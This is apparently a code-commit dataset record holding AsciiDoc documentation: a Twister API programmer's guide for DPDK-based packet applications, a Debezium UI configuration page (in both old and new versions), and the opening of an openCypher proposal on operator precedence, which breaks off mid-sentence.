This is the only interrupt that a PMD handles\r\n* Port and Queue setup for both RX and TX\r\n* Access the RX and TX descriptors directly without any interrupts\r\n* Assign user-specified parameters to the physical device.\r\nIn the Twister API, all the above initialization steps are performed by a single API call:\r\ntw_init_global(argc, argv)\r\nThe user-specified parameters for the physical device are provided in the port_conf file. This file must be present in the application directory. The parameters are further explained in the section below.\r\n\r\n=== Port Management\r\nPort management assigns specific parameters to a port, including the IP address, subnet mask, and gateway IP. All this is done in the initialization module. The user just has to provide a file to the module, which is port_conf. The configuration file should be in JSON format; samples are provided below.\r\n\r\nThe port_conf file is an array of JSON fields. Each array [port_name: <>, ip_addrs:<>] corresponds to one port:\r\n* port_name: This is an identifier that lists the port name. The port name is assigned by the Twister Virtual Machine (TVM) OS. TVM assigns the port name as *tw<X>* according to the PCI ID in numerical order. So if a TVM has two ports, the port name for the first one will be tw0 and for the second one will be tw1.\r\n* ip_addrs: This field lists the IP address range to be assigned to the port. It contains the following sub-fields:\r\na. start_ip_addr: The IP address, in string format, assigned to the port.\r\nb. num_ip_addrs: This number specifies the range of IP addresses for this port.\r\nc. gateway_ip: The gateway for this particular port.\r\nd. subnet_mask: The mask to determine the subnet of this port.\r\n
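For example, a single-port port_conf could look like the following sketch. The addresses are illustrative and the loose notation mirrors the multi-port sample below; check the exact syntax against the samples shipped with your release:\r\n--------------------------------------\r\n[\r\n [\r\n port_name: tw0,\r\n ip_addrs: [\r\n start_ip_addr: 192.168.1.10,\r\n num_ip_addrs: 4,\r\n gateway_ip: 192.168.1.1,\r\n subnet_mask: 255.255.255.0\r\n ]\r\n ]\r\n]\r\n--------------------------------------\r\n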
\r\nFor an application using multiple ports (e.g. two), the format of port_conf would be: \r\n[\r\n [\r\n port_name:tw0\r\n\tip_addrs:[]\r\n ],\r\n [\r\n port_name:tw1\r\n\tip_addrs:[]\r\n ]\r\n] \r\n\r\n\r\n== Event loop\r\nThe Twister API provides an event loop which is based on the *libuv* model.\r\n\r\n\r\nThe Twister API implementation of the event loop has the following features:\r\n1. Event callback registration: Users can register three types of handles in the loop. \r\n* RX handle: These handles are used for receiving packets. Currently only one RX handle is supported. This callback is called when any type of packet is received.\r\n* TX handle: Multiple TX handles can be registered. Each handle's callback will be called once per event loop iteration.\r\n* Timer handle: This handle's callback will be called after a fixed timeout.\r\n2. With each instance of a handle, one callback function is registered. This is called when the event occurs.\r\n\r\n=== Comparison of Twister API calls and libuv calls\r\n\r\n[cols=\"1,4,4\", options=\"header\"]\r\n|===\r\n| Sr. | Twister | Libuv\r\n\r\n| 1.\r\n| tw_default_loop: Reserve memory for an event loop with which handles can be registered. The loop's total time to run is also provided\r\n| uv_default_loop: Reserve memory for an event loop with which handles can be registered\r\n\r\n| 2.\r\n| tw_<handlename>_init: Reserve memory for a handle pointer and register it with an event loop instance\r\n| uv_<handlename>_init: Reserve memory for a handle pointer and register it with an event loop instance\r\n\r\n| 3.\r\n| tw_<handlename>_start: Register a callback function for the handle\r\n| uv_<handlename>_start: Register a callback function for the handle\r\n\r\n| 4.\r\n| tw_run: Start the event loop\r\n| uv_run: Start the event loop\r\n|===\r\n\r\n== ARP Table\r\nThe Twister API has built-in ARP functionality which users can utilize in their applications through simple calls. The API will maintain the table locally. If the application sends a packet whose destination MAC is not known, the API stores the packet in a queue, generates an ARP query for the IP, and automatically updates the queued packets once the ARP response is received.\r\nThe API can also respond to ARP queries for the IP addresses of the interfaces which the API is handling. The application programmer just has to add the tw_arp_parser in the application flow. The rest is the job of the API. To list all the ARP functions and their usage, kindly use the Twister API Reference documentation provided on GitHub. It can be accessed via the twister\/documentation\/html\/index.html file.\r\n\r\n\r\n\r\n\r\n== Building the Applications\r\n\r\n=== Cloning the Repository\r\n\r\nClone the desired branch from the Dell Twister repository (https:\/\/github.com\/delltwister\/twister). Navigate to the directory of the desired example. \r\n\r\n=== Compiling a Sample Application\r\nThe sample applications can be built using the following commands:\r\n--------------------------------------\r\n\tmake clean\r\n\tmake\r\n--------------------------------------\r\n\r\n=== Customizing the Application Makefile\r\nThe default Makefile provided with the UDP Echo sample application is a good starting point. It includes:\r\n* twister.mk at the beginning\r\nThe user must define the following variables:\r\n* APP: Contains the name of the application.\r\n* SRCS: List of source files (*.c).\r\nThe rest of the Makefile can be customized as a normal Makefile.\r\n\r\n\r\n\r\n== Sample Applications Details\r\nThe general flow of a Twister API application follows the initialization and event loop pattern described in the previous sections.\r\n\r\nThere are three sample applications developed for Twister API release 0.1. They include the following:\r\n1. UDP Send Application: This application is a tester client application which generates UDP traffic by sending timestamps to an echo server. It also receives any timestamps echoed back and calculates the RTT.\r\n2. UDP Echo Application: This application receives the UDP traffic and echoes it back to the sender.\r\n3. Ethernet Echo Application: This application is a simple Layer 2 forwarding application which echoes every packet it receives after changing the MAC.\r\nThe UDP Echo server application is sketched below:\r\n
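\r\nThe following condensed sketch shows the server's flow; it is not the full source. Error handling and the body of the reply_payload() receive callback (which echoes the timestamp back to the client) are omitted, and the declarations follow the API calls documented above:\r\n--------------------------------------\r\n\/* Create an event loop handler; a value of 0 (INFINITE_LOOP) runs it forever. *\/\r\nstruct tw_loop_s * tw_loop = tw_default_loop(INFINITE_LOOP);\r\n\r\n\/* Add an RX handle to the event loop. *\/\r\ntw_rx_t * server = tw_rx_init(tw_loop);\r\n\r\n\/* Register reply_payload() as the receive callback, fired for every received packet. *\/\r\ntw_rx_start(server, reply_payload);\r\n\r\n\/* Execute the configured event loop. *\/\r\ntw_run(tw_loop);\r\n--------------------------------------\r\n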
\r\n\r\n\r\n\r\n\r\n== Appendices\r\n\r\nHW\/SW Information Relating to Twister API\r\nIntel DPDK Version: 2.0.0\r\nLinux Kernel Version: 3.11.0-12-generic\t\r\nLinux Version: Ubuntu 12.04\r\nTwister VM Architecture: x86_64\r\nCPU Model: Intel Xeon E312xx (Sandy Bridge)\r\nGCC Version: 4.8.1\r\nIntel NICs Used for testing purposes: Virtual Functions of Intel x520 and x540 Dual Port 10G NICs\r\n\r\n\r\n \r\n\r\n","old_contents":"=TWISTER APPLICATION PROGRAMMERS GUIDE\r\n:docinfo:\r\n[preface]\r\n== Introduction\r\nThis document gives an overview of the modules build in Twister API and how an application is built on it. The detailed definitions and individual function calls can be found in the doc folder of Twister API. \r\nAt start, the document explains the core modules of twister API, these include initialization module, event loop, ARP table management and JSON parsing. Details of build system are also included.\r\nAfter that, it explains the sample application step by step to give programmer an example of API usage. The Appendices contain information to debug any relevant issues. \r\nThe best way to start is to go through the Sample Applications Details Section initially while reviewing the code of the sample application and then go through the whole document for complete understanding of design of Twister API and application development on top of it. \r\n\r\n\r\n\r\nInitialization Module\r\nThe initialization module of API handles the initialization of twister abstraction layer. Abstraction layer consists of the following parts:\r\n* System Memory Reservation: The abstraction layer facilitates the reservation of different memory zones, for example, physical memory areas for device interactions.\r\n* Allocate PCI resources and set up the physical device and the link\r\n* Initialize statistics counters\r\n* Link Up\/Down control and notification interrupt. This is the only interrupt that a PMD handles\r\n* Port and Queue setup for both RX and TX\r\n* Access the RX and TX descriptors directly without any interrupts\r\n* Assign user specified parameters to the physical device.\r\nIn the Twister API, all the above initialization steps are formed by single API call which is:\r\ntw_init_global(argc, argv)\r\nThe user specified parameters for the physical device are provided in the port_conf file. This file must be present in the application directory. The parameters are further explained in the below section:\r\n\r\nPort Management \r\nThe port management is assigning specific parameters which include IP address, subnet mask, gateway IP to the port. All this is done in the initialization module. The user just hast to provide a file to the module, which is port_conf. The configuration file should be in JSON format and a sample is provided below:\r\n\r\nport_conf file is array of JSON fields. Each array [port_name: <>, ip_addrs:<>] corresponds to one port:\r\n* port_name: This is an identifier that lists the port name. The port name is assigned by Twister Virtual Machine (TVM)OS. TVM assigns the port name as tw<X> according to the PCI ID in a numerical order. So if a TVM has two ports, the port name for first one will be tw0 and for the second one will be tw1.\r\n* ip_addrs: This field lists the IP address range to be assigned for the port. It contains two sub fields:\r\na. start_ip_addr: IP address in string format, assigned to the port.\r\nb. num_ip_addrs: This number specify the range of IP addresses for this port.\r\nc. gateway_ip: It will list the gateway for this particular port.\r\nd. 
subnet_mask: The mask to determine the subnet of this port. \r\n*For an application using multiple ports e.g. 2, the format of port_conf would be i.e. \r\n[\r\n [\r\n port_name:tw0\r\n\tip_addrs:[]\r\n ],\r\n [\r\n port_name:tw1\r\n\tip_addrs:[]\r\n ]\r\n] \r\n\r\n\r\n==Event loop\r\nTwister API provides an event loop which is based on libuv model with general flow shown below:\r\n\r\n\r\nThe Twister API implementation of event loop has the following features:\r\n1. Event callback registration: Users can register three types of handles in the loop. \r\n* RX handle: These handles are used for receiving packets. Currently only one RX handle is supported. This callback is called when any type of packet is received.\r\n* TX handle: Multiple TX handles can be registered. Each handles callback will be called once per event loop iteration.\r\n* Timer handle: This handles callback will be called after a fixed timeout.\r\n2. With each instance of a handle, one callback function is registered. This is called when the event has occurred.\r\n\r\n===Comparison of twister API calls and Libuv calls are given below:\r\n\r\nSr.\r Twister\rLibuv\r1.\rtw_default_loop: Reserve memory for an event loop with which handles can be registered. The loops total time to run is also provided\ruv_default_loop: Reserve memory for an\r\nevent loop with which handles can be\r\nregistered\r2.\rtw_<handlename>_init: Reserve memory for handle pointer and register it with an event loop instance\ruv_<handlename>_init: Reserve memory for handle pointer and register it with an event loop instance\r3.\rtw_<handlename>_start: Register a callback function for the handle\ruv_<handlename_start>: Register a callback function for the handle\r4.\rtw_run: Start the event loop\ruv_run: Start the event loop\r\r\n\r\n== ARP Table\r\nThe Twister API has built-in ARP functionality which user can utilize in their application using simple calls. The API will maintain the table locally. If application is sending a packet whose MAC is not known, the API will store the packet in the queue and generate an ARP query for the IP and automatically update the queued packets once the ARP respond is received.\r\nThe API can also respond to the ARP query for the IP addresses of the interfaces which the API is handling. The application programmer just has to add the tw_arp_parser in the application flow. Rest will be the job of the API. To list all the ARP functions and their usage, kindly use the Twister API Reference documentation provided on Github. It can be accessed the twister\/documentation\/html\/index.html file.\r\n\r\n\r\n\r\n\r\n==Building the Applications\r\nCloning the Repository\r\n\r\nClone the desired branch from dell twister repository (https:\/\/github.com\/delltwister\/twister). Navigate to the directory of desired example. \r\n\r\n===Compiling a Sample Application\r\nThe sample applications can be built using the following commands:\r\n % make clean\r\n %make\r\n===Customizing the Application Makefile\r\nThe default Makefile provided with the UDP Echo sample application is a good starting point. It includes:\r\n* twister.mk at the beginning\r\nThe user must define following variables:\r\n* APP: Contains the name of the application.\r\n* SRCS: List of source files (*.c).\r\nThe rest of the Makefile can be customized as a normal Makefile.\r\n\r\n\r\n\r\n==Sample Applications Details\r\nThe general flow of Twister API applications is as follows:\r\n\r\nThere are three sample applications developed for Twister API release 0.1. 
\r\n\r\n== ARP Table\r\nThe Twister API has built-in ARP functionality which users can utilize in their applications through simple calls. The API maintains the ARP table locally. If the application sends a packet whose destination MAC address is not known, the API stores the packet in a queue, generates an ARP query for the IP, and automatically updates the queued packets once the ARP response is received.\r\nThe API can also respond to ARP queries for the IP addresses of the interfaces which the API is handling. The application programmer just has to add tw_arp_parser to the application flow; the rest is the job of the API. To list all the ARP functions and their usage, kindly use the Twister API Reference documentation provided on GitHub. It can be accessed from the twister\/documentation\/html\/index.html file.\r\n\r\n== Building the Applications\r\n\r\n=== Cloning the Repository\r\nClone the desired branch from the Dell Twister repository (https:\/\/github.com\/delltwister\/twister). Navigate to the directory of the desired example.\r\n\r\n=== Compiling a Sample Application\r\nThe sample applications can be built using the following commands:\r\n % make clean\r\n % make\r\n\r\n=== Customizing the Application Makefile\r\nThe default Makefile provided with the UDP Echo sample application is a good starting point. It includes:\r\n\r\n* twister.mk at the beginning\r\n\r\nThe user must define the following variables:\r\n\r\n* APP: Contains the name of the application.\r\n* SRCS: List of source files (*.c).\r\n\r\nThe rest of the Makefile can be customized as a normal Makefile; a minimal sketch is shown below.
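\r\n\r\nA minimal Makefile along these lines (the application name and source list are illustrative):\r\n\r\n[source, make]\r\n----\r\n# Twister build rules are included at the beginning,\r\n# as in the UDP Echo sample.\r\ninclude twister.mk\r\n\r\n# Name of the application binary.\r\nAPP = udp_echo\r\n\r\n# Application source files (*.c).\r\nSRCS = main.c\r\n----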
\r\n\r\n== Sample Applications Details\r\nThe general flow of a Twister API application follows the initialization and event-loop pattern described above. There are three sample applications developed for Twister API release 0.1. They include the following:\r\n\r\n1. UDP Send Application: This application is a tester client which generates UDP traffic by sending timestamps to an echo server. It also receives any timestamps echoed back and calculates the RTT.\r\n2. UDP Echo Application: This application receives the UDP traffic and echoes it back to the sender.\r\n3. Ethernet Echo Application: This application is a simple Layer 2 forwarding application which simply echoes every packet it receives by changing the MAC addresses.\r\n\r\nThe UDP Echo server application is discussed below.\r\n\r\n=== UDP Echo Server\r\nA step-by-step explanation of the UDP Echo server follows:\r\n\r\n* tw_init_global() initializes the global environment for a Twister application by configuring the ports and engines available on the machine.\r\n* tw_map_port_to_engine() binds a NIC port to a specific engine, so all the incoming\/outgoing traffic on that port (tw<x>) will be managed by the engine (engine<x>). It takes:\r\n** A port name (tw0, tw1, ..., depending upon the number of available ports on the machine)\r\n** An engine name (engine0, engine1, ..., depending upon the number of available engines on the machine)\r\n* In user_app_main(), the main logic of the UDP Echo application resides. Since this application only echoes back the incoming packets, we have to create a callback function which fires every time a packet arrives.\r\n* tw_rx_t * server; is a pointer to the callback struct that configures the RX callback:\r\n\r\n struct tw_rx_s {\r\n     uint8_t handle_type;\r\n     uint64_t last_run_time;\r\n     int sock_fd;\r\n     struct tw_sockaddr_in * addr;\r\n     uint8_t flags;\r\n     void * recv_cb;\r\n     struct tw_rx_s * next;\r\n };\r\n\r\n** handle_type tells which callback type the handle corresponds to. Since this is a receive callback function, we set its value to RX_CALLBACK. Currently only three types of callback functions are supported: RX_CALLBACK, TX_CALLBACK, and TIMER_CALLBACK.\r\n** last_run_time tells when this event was last fired. Each time a packet arrives, the timestamp in this variable is updated. For the first time we set it to 0.\r\n** recv_cb is a pointer to the function that will be executed each time a receive event occurs. Our callback function is reply_payload, so we set this pointer to the function reply_payload. Every time we receive a packet, the reply_payload function is called. In this function, the user can implement any RX logic. In our case, we echo the timestamp in the payload and send the UDP packet back to the client.\r\n* tw_default_loop(INFINITE_LOOP); creates an infinite event-loop handler, and its address is returned as a pointer. tw_default_loop() takes an argument in seconds and runs the event loop for that time; a value of 0 will make it run infinitely. The INFINITE_LOOP parameter has the value 0. This event-loop handler is described below:\r\n\r\n struct tw_loop_s {\r\n     void* data;\r\n     uint8_t active_handles;\r\n     struct tw_rx_s * rx_handle_queue;\r\n     struct tw_tx_s * tx_handle_queue;\r\n     struct tw_timer_s * timer_handle_queue;\r\n     unsigned int stop_flag;\r\n     uint16_t secs_to_run;\r\n };\r\n\r\n** data: User data; this can be used for any data\/functions the user wants to use with this event loop.\r\n** active_handles: The number of active handles this event loop is currently managing. This can include multiple Rx, Tx, and timer handles. Twister's main event loop uses this; users don't need to deal with it.\r\n** rx_handle_queue: A linked list of all the Rx handlers.\r\n** tx_handle_queue: A linked list of all the Tx handlers.\r\n** timer_handle_queue: A linked list of all the timer handlers.\r\n** stop_flag: This flag is raised when the event-loop timer expires.\r\n** secs_to_run: The number of seconds for which this event loop will run.\r\n* tw_rx_init(tw_loop); adds an Rx handler to the event loop (tw_loop) and returns the pointer to the new handler added to the rx_handle_queue of the event loop.\r\n* tw_rx_start(server, reply_payload); assigns the receive callback function to the receive handler, so every time a receive event occurs, i.e. a packet is received, the callback function assigned to the handler is executed. It takes two arguments:\r\n** server: A pointer to a receive handler of type tw_rx_s.\r\n** reply_payload: A receive callback function.\r\n* tw_run(tw_loop); takes a configured event-loop handler and executes it for whatever time the user has configured. The whole flow is condensed in the sketch below.
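\r\n\r\nPutting the steps together (the header name, the callback signature, and the argument types of tw_map_port_to_engine() are assumptions; the call sequence is the one described above):\r\n\r\n[source, c]\r\n----\r\n#include \"twister.h\"                        \/* assumed header name *\/\r\n\r\n\/* Assumed signature; echoes the timestamp payload back to the client. *\/\r\nstatic void reply_payload(tw_rx_t *server)\r\n{\r\n    \/* Implement the RX logic here. *\/\r\n}\r\n\r\nint main(int argc, char **argv)\r\n{\r\n    tw_init_global(argc, argv);              \/* ports + engines from port_conf *\/\r\n    tw_map_port_to_engine(\"tw0\", \"engine0\"); \/* bind port tw0 to engine0 *\/\r\n\r\n    struct tw_loop_s *tw_loop = tw_default_loop(INFINITE_LOOP);\r\n    tw_rx_t *server = tw_rx_init(tw_loop);   \/* add an Rx handler to the loop *\/\r\n    tw_rx_start(server, reply_payload);      \/* register the receive callback *\/\r\n    tw_run(tw_loop);                         \/* run until stop_flag is raised *\/\r\n    return 0;\r\n}\r\n----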
\r\n\r\n== Writing a New Application\r\nThe best way to start writing a new application is to copy an existing Twister API application and modify it. To list the functions and their usage, kindly use the Twister API Reference documentation provided on GitHub. It can be accessed from the twister\/documentation\/html\/index.html file.\r\n\r\n== Appendices\r\n\r\nHW\/SW information relating to the Twister API:\r\n\r\nIntel DPDK Version: 2.0.0\r\nLinux Kernel Version: 3.11.0-12-generic\r\nLinux Version: Ubuntu 12.04\r\nTwister VM Architecture: x86_64\r\nCPU Model: Intel Xeon E312xx (Sandy Bridge)\r\nGCC Version: 4.8.1\r\nIntel NICs used for testing purposes: Virtual Functions of Intel x520 and x540 Dual Port 10G NICs\r\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7a41aa4bafdea0b66b2f9cbfcfa57e0e80b10952","subject":"[docs] Adjusting var name in UI docs","message":"[docs] Adjusting var name in UI docs\n\n","repos":"debezium\/debezium,debezium\/debezium,debezium\/debezium,debezium\/debezium","old_file":"documentation\/modules\/ROOT\/pages\/operations\/debezium-ui.adoc","new_file":"documentation\/modules\/ROOT\/pages\/operations\/debezium-ui.adoc","new_contents":"[id=\"debezium-ui\"]\n= {prodname} UI\n\n:linkattrs:\n:icons: font\n:toc:\n:toclevels: 3\n:toc-placement: macro\n\ntoc::[]\n\n[NOTE]\n====\nThis feature is currently in incubating state, i.e. exact semantics and behaviours etc. may change in future revisions, based on the feedback we receive.\nPlease let us know about your feature requests or if you encounter any problems while using the {prodname} UI.\n====\n\nThe {prodname} UI allows users to set up and operate connectors more easily. For instance, a list of all connectors can be viewed along with their status, etc. The Create Connector wizard allows the user to configure connectors, guiding and validating the property entries along the way.\n\n== Design Considerations\n\nThe UI is implemented as a https:\/\/quarkus.io\/[Quarkus]-based web application. The backend is configured with the URL(s) of one or more Kafka Connect clusters and provides a REST interface for the frontend. The frontend user interface uses https:\/\/reactjs.org\/[ReactJS] as the primary technology, utilizing https:\/\/www.patternfly.org\/v4\/[Patternfly] React components and design patterns.\n\n== Installation and Configuration\n\n=== Configure the Debezium UI\nThe following table shows the environment variables for the https:\/\/hub.docker.com\/r\/debezium\/debezium-ui[Debezium UI container image] and the related parameter names inside `application.properties` when running the Java application without the container.\n\n[cols=\"1,2,2,2,6\",options=\"header\"]\n\n|===\n|Item |Environment variable |Parameter name in application.properties |Default value |Description\n\n|1\n|DEPLOYMENT_MODE[[DEPLOYMENT_MODE]]\n|`deployment.mode`\n|default\n|Specifies how the Debezium UI is deployed. +\n +\nFor example, in some environments it might not be possible to reach the underlying backend, the Kafka Connect REST interface, or the databases; in that case the link:#DEPLOYMENT_MODE[deployment mode] can be switched to match the underlying infrastructure. +\n +\n`default` The default deployment mode. It uses the Debezium UI backend with the configured Kafka Connect clusters via the Kafka Connect REST interface (see link:#KAFKA_CONNECT_URIS[KAFKA_CONNECT_URIS] for how they are configured). +\n +\n +\n`validation.disabled` When set to validation.disabled, the UI frontend will neither call the backend to validate the user input nor check the availability and proper configuration of database connections. That mode is used to only generate the Debezium connector JSON configuration, without the UI backend validation. +\n +\n|2\n|KAFKA_CONNECT_URIS[[KAFKA_CONNECT_URIS]]\n|`kafka.connect.uris`\n|http:\/\/connect:8083\n|A comma-separated list of one or more URLs of Kafka Connect REST interfaces to specify the Kafka Connect clusters that should be managed by the Debezium UI.\n\n|===
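\n\nFor example, the equivalent settings in `application.properties` might look like this (the host names are placeholders):\n\n----\ndeployment.mode=default\nkafka.connect.uris=http:\/\/connect-a:8083,http:\/\/connect-b:8083\n----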
\n\n=== Debezium UI container image\n\nThe Debezium UI https:\/\/hub.docker.com\/r\/debezium\/debezium-ui[container image] is available for running the UI. To start the UI and connect to an existing Kafka Connect instance via Docker (where KAFKA_CONNECT_URIS supplies the comma-separated list of available URI(s)):\n\n----\n$ docker run -it --rm --name debezium-ui -p 8080:8080 -e KAFKA_CONNECT_URIS=http:\/\/connect:8083 debezium\/debezium-ui:{debezium-version}\n----\n\nThe UI connects to Kafka Connect via REST, so you need to make sure that the latter is reachable, e.g. by running both components on the same Docker network.\n\n[NOTE]\n====\nCurrently, the UI connects to un-authenticated Kafka Connect instances. Also, there's no authorization or authentication implemented in the UI itself yet. Until that is the case, you should secure the components, e.g. with your own proxy for authorization, if needed.\n====\n\n=== Self-contained example\n\nA self-contained example https:\/\/github.com\/debezium\/debezium-examples\/tree\/main\/ui-demo[ui-demo] is available, which is included under https:\/\/github.com\/debezium\/debezium-examples[debezium-examples] on GitHub. The ui-demo includes a docker-compose file which brings up several sources with data as well as the UI. Please refer to the https:\/\/github.com\/debezium\/debezium-examples\/tree\/main\/ui-demo[README file] for more details on running the Debezium ui-demo.\n\n== UI Operation\n\n=== UI Connector List\nThe main page of the UI displays all the registered connectors. Some of the highlights of the main page are as follows:\n\n* The *Kafka connect cluster* can be selected via the dropdown in the header.\n* The connector table shows each connector with its type (MySQL, PostgreSQL, MongoDB), connector status, and connector tasks.\n* A connector row can be expanded to show more details, as shown below with the 'testPostgres' connector. Metrics are shown in the expansion area (*Note:* this feature is still under development and not functional yet). Connector tasks are shown, with the ability to *Restart* the task if desired.\n* The kebab menu at the right of each connector row provides actions which allow the user to *Pause, Resume, Restart or Delete* the connector.\n\nimage::debezium-ui-connectors-list.png[{prodname} UI connectors]\n\n=== UI Create Connector Wizard\nThe user can create a connector by clicking on the *Create a connector* button on the main page. The first two steps of the wizard are required, but the remaining steps are optional. Each step will validate the user entries and provide feedback if there are problems. After completing steps 1 and 2 successfully, the user can proceed to the final page to review and create the connector.\n\n==== Create Connector - Connector type (required)\nChoose the type of connector in step 1. Currently the *MongoDB, MySQL and PostgreSQL* connector types are supported. Support for more connector types is currently in progress.\n\nimage::debezium-ui-create-connector-step1.png[{prodname} UI Create connector step1]\n\n==== Create Connector - Properties (required)\nThe basic connection properties for the selected connector are entered in step 2, and the properties must be validated before proceeding. Advanced connection properties are also provided in a separate section of this step. Upon successful validation, the user may proceed to the next steps (Additional properties), or they can elect to bypass the additional properties and proceed directly to Review.\n\nimage::debezium-ui-create-connector-step2.png[{prodname} UI Create connector step2]\n\n==== Create Connector - Additional properties (optional)\nThe Additional properties are optional and can be summarized as follows:\n\n* *Filter definition* - entry of *regular expressions* which define the filters for inclusion\/exclusion of the items that will be included for CDC. The included items are displayed as the filters are entered and applied.\n* *Data options* - *Snapshot* and *Mapping* properties (optional). The defaults can be viewed and changed if desired.\n* *Runtime options* - *Engine* and *Heartbeat* properties (optional). The defaults can be viewed and changed if desired.\n\n==== Create Connector - Review\nThe *Review* step provides a summary of the configuration that will be used to create the connector. If you are happy with the selections, click 'Finish' to create the connector. If the properties need adjustment, navigate back to the earlier steps.\n\nimage::debezium-ui-create-connector-review.png[{prodname} UI Create connector review]\n","old_contents":"[id=\"debezium-ui\"]\n= {prodname} UI\n\n:linkattrs:\n:icons: font\n:toc:\n:toclevels: 3\n:toc-placement: macro\n\ntoc::[]\n\n[NOTE]\n====\nThis feature is currently in incubating state, i.e. exact semantics and behaviours etc. may change in future revisions, based on the feedback we receive.\nPlease let us know about your feature requests or if you encounter any problems while using the {prodname} UI.\n====\n\nThe {prodname} UI allows users to set up and operate connectors more easily. 
For instance, a list of all connectors can be viewed along with their status, etc. The Create Connector wizard allows the user to configure connectors, guiding and validating the property entries along the way.\n\n== Design Considerations\n\nThe UI is implemented as a https:\/\/quarkus.io\/[Quarkus]-based web application. The backend is configured with the URL(s) of one or more Kafka Connect clusters and provides a REST interface for the frontend. The frontend user interface uses https:\/\/reactjs.org\/[ReactJS] as the primary technology, utilizing https:\/\/www.patternfly.org\/v4\/[Patternfly] React components and design patterns.\n\n== Installation and Configuration\n\n=== Configure the Debezium UI\nThe following table shows the environment variables for the https:\/\/hub.docker.com\/r\/debezium\/debezium-ui[Debezium UI container image] and the related parameter names inside `application.properties` when running the Java application without the container.\n\n[cols=\"1,2,2,2,6\",options=\"header\"]\n\n|===\n|Item |Environment variable |Parameter name in application.properties |Default value |Description\n\n|1\n|DEPLOYMENT_MODE[[DEPLOYMENT_MODE]]\n|`deployment.mode`\n|default\n|Specifies how the Debezium UI is deployed. +\n +\nFor example, in some environments it might not be possible to reach the underlying backend, the Kafka Connect REST interface, or the databases; in that case the link:#DEPLOYMENT_MODE[deployment mode] can be switched to match the underlying infrastructure. +\n +\n`default` The default deployment mode. It uses the Debezium UI backend with the configured Kafka Connect clusters via the Kafka Connect REST interface (see link:#KAFKA_CONNECT_URI[KAFKA_CONNECT_URI] for how they are configured). +\n +\n +\n`validation.disabled` When set to validation.disabled, the UI frontend will neither call the backend to validate the user input nor check the availability and proper configuration of database connections. That mode is used to only generate the Debezium connector JSON configuration, without the UI backend validation. +\n +\n|2\n|KAFKA_CONNECT_URI[[KAFKA_CONNECT_URI]]\n|`kafka.connect.uri`\n|http:\/\/connect:8083\n|A comma-separated list of one or more URLs of Kafka Connect REST interfaces to specify the Kafka Connect clusters that should be managed by the Debezium UI.\n\n|===\n\n=== Debezium UI container image\n\nThe Debezium UI https:\/\/hub.docker.com\/r\/debezium\/debezium-ui[container image] is available for running the UI. To start the UI and connect to an existing Kafka Connect instance via Docker (where KAFKA_CONNECT_URI supplies the comma-separated list of available URI(s)):\n\n----\n$ docker run -it --rm --name debezium-ui -p 8080:8080 -e KAFKA_CONNECT_URI=http:\/\/connect:8083 debezium\/debezium-ui:{debezium-version}\n----\n\nThe UI connects to Kafka Connect via REST, so you need to make sure that the latter is reachable, e.g. by running both components on the same Docker network.\n\n[NOTE]\n====\nCurrently, the UI connects to un-authenticated Kafka Connect instances. Also, there's no authorization or authentication implemented in the UI itself yet. Until that is the case, you should secure the components, e.g. with your own proxy for authorization, if needed.\n====\n\n=== Self-contained example\n\nA self-contained example https:\/\/github.com\/debezium\/debezium-examples\/tree\/main\/ui-demo[ui-demo] is available, which is included under https:\/\/github.com\/debezium\/debezium-examples[debezium-examples] on GitHub. 
The ui-demo includes a docker-compose file which brings up several sources with data as well as the UI. Please refer to the https:\/\/github.com\/debezium\/debezium-examples\/tree\/main\/ui-demo[README file] for more details on running the Debezium ui-demo.\n\n== UI Operation\n\n=== UI Connector List\nThe main page of the UI displays all the registered connectors. Some of the highlights of the main page are as follows:\n\n* The *Kafka connect cluster* can be selected via the dropdown in the header.\n* The connector table shows each connector with its type (MySQL, PostgreSQL, MongoDB), connector status, and connector tasks.\n* A connector row can be expanded to show more details, as shown below with the 'testPostgres' connector. Metrics are shown in the expansion area (*Note:* this feature is still under development and not functional yet). Connector tasks are shown, with the ability to *Restart* the task if desired.\n* The kebab menu at the right of each connector row provides actions which allow the user to *Pause, Resume, Restart or Delete* the connector.\n\nimage::debezium-ui-connectors-list.png[{prodname} UI connectors]\n\n=== UI Create Connector Wizard\nThe user can create a connector by clicking on the *Create a connector* button on the main page. The first two steps of the wizard are required, but the remaining steps are optional. Each step will validate the user entries and provide feedback if there are problems. After completing steps 1 and 2 successfully, the user can proceed to the final page to review and create the connector.\n\n==== Create Connector - Connector type (required)\nChoose the type of connector in step 1. Currently the *MongoDB, MySQL and PostgreSQL* connector types are supported. Support for more connector types is currently in progress.\n\nimage::debezium-ui-create-connector-step1.png[{prodname} UI Create connector step1]\n\n==== Create Connector - Properties (required)\nThe basic connection properties for the selected connector are entered in step 2, and the properties must be validated before proceeding. Advanced connection properties are also provided in a separate section of this step. Upon successful validation, the user may proceed to the next steps (Additional properties), or they can elect to bypass the additional properties and proceed directly to Review.\n\nimage::debezium-ui-create-connector-step2.png[{prodname} UI Create connector step2]\n\n==== Create Connector - Additional properties (optional)\nThe Additional properties are optional and can be summarized as follows:\n\n* *Filter definition* - entry of *regular expressions* which define the filters for inclusion\/exclusion of the items that will be included for CDC. The included items are displayed as the filters are entered and applied.\n* *Data options* - *Snapshot* and *Mapping* properties (optional). The defaults can be viewed and changed if desired.\n* *Runtime options* - *Engine* and *Heartbeat* properties (optional). The defaults can be viewed and changed if desired.\n\n==== Create Connector - Review\nThe *Review* step provides a summary of the configuration that will be used to create the connector. If you are happy with the selections, click 'Finish' to create the connector. 
If the properties need adjustment, navigate back to the earlier steps.\n\nimage::debezium-ui-create-connector-review.png[{prodname} UI Create connector review]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"41fd46ea175435c533df2d861f12628a08908c19","subject":"Fix typo","message":"Fix typo","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/1.accepted\/CIP2021-08-10-Operator-precedence.adoc","new_file":"cip\/1.accepted\/CIP2021-08-10-Operator-precedence.adoc","new_contents":"= CIP2021-08-10 Operator precedence\n:numbered:\n:toc:\n:toc-placement: macro\n:source-highlighter: codemirror\n\n*Authors:* Hannes Voigt <hannes.voigt@neo4j.com>\n\n\n[abstract]\n.Abstract\n--\nThis CIP defines the operator precedence rules of openCypher.\n--\n\ntoc::[]\n\n== Background\n\nThe expression sub-languages of openCypher (and most other query and programming languages) allow very liberal composition of different elementary expressions into complex expressions through nesting.\nElementary expressions are the kinds of expressions that the expression sub-languages provide and which form the building blocks of these sub-languages.\n\nSome elementary expressions have zero operands, e.g. 
